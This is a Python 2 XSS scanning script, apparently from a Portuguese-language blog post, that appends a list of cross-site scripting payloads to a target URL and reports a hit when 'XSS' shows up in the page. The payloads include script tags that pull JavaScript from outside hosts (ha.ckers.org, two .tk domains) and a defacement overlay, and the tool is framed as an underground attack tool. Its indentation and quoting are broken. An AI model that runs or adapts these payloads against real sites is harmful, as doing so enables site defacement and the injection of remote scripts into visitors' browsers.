import sys,os,re,urllib,urllib2,socket,string
if len(sys.argv)<2:
print "\n X86_G XSS CHECKER"
print "\n\DELIBERING ALL UNDERGROUND!"
print "\n Usage: xsschecker.py <site>"
print "\n Example: xsschecker.py http://www.g00gl3.com/ap/?index=" "
sys.exit(0)
site=sys.argv[1]
payload = [ "<script>alert('xss by x86_g')</script>",
"<SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT>",
"<SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT>",
"<IMG SRC=javascript:alert('XSS')>",
"<IMG SRC=JaVaScRiPt:alert('XSS')>",
"<IMG SRC=javascript:alert("XSS")>",
"<IMG SRC=`javascript:alert( 'XSS')`>",
"<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>",
"<IMG SRC=javascript:alert('XSS')>",
"<IMG SRC=javascript:alert('XSS')>",
"<IMG SRC=javascript:alert('XSS')>",
"<IMG SRC=javascript:alert('XSS')>",
"<<SCRIPT>alert('XSS');//<</SCRIPT>",
"<SCRIPT SRC=http://ha.ckers.org/xss.js?<B>",
"<SCRIPT SRC=//ha.ckers.org/.j>",
"<SCRIPT>a=/XSS/alert(a.source)</SCRIPT>",
"</TITLE><SCRIPT>alert('XSS by x86_g');</SCRIPT>",
"<script src=http://he7le.tk></script><script src=http://2x7if.tk></script><style>body{height:100%;}#h{opacity:0.8;position:absolute;_position:absolute;top:0;left:0;height:100%;width:100%;display:block;background:#000;z-index:2;}#h h1{text-align:center;color:red;font-size:22px;font-weight:700;}</style><body id=b><div id=h><h1>xss by x86_g</h1></div><script>$("#b").click('shake',{times:3},600);}</script></body>"]
reply=["xss","XSS","Xss"]
j=len(payload)
print "[+]Invarients Loaded",j
for payloads in payload:
try:
attack= urllib2.urlopen(site+payloads, "80").readlines()
for line in attack:
if re.search("XSS",line.upper()):
print "Vulnerablity Found at: ",site+payloads
break
except(urllib2.URLError, socket.timeout, socket.gaierror, socket.error):
pass
except(KeyboardInterrupt):
pass
Home »
» XSS SCRIPT CHECKER
0 comentários:
Postar um comentário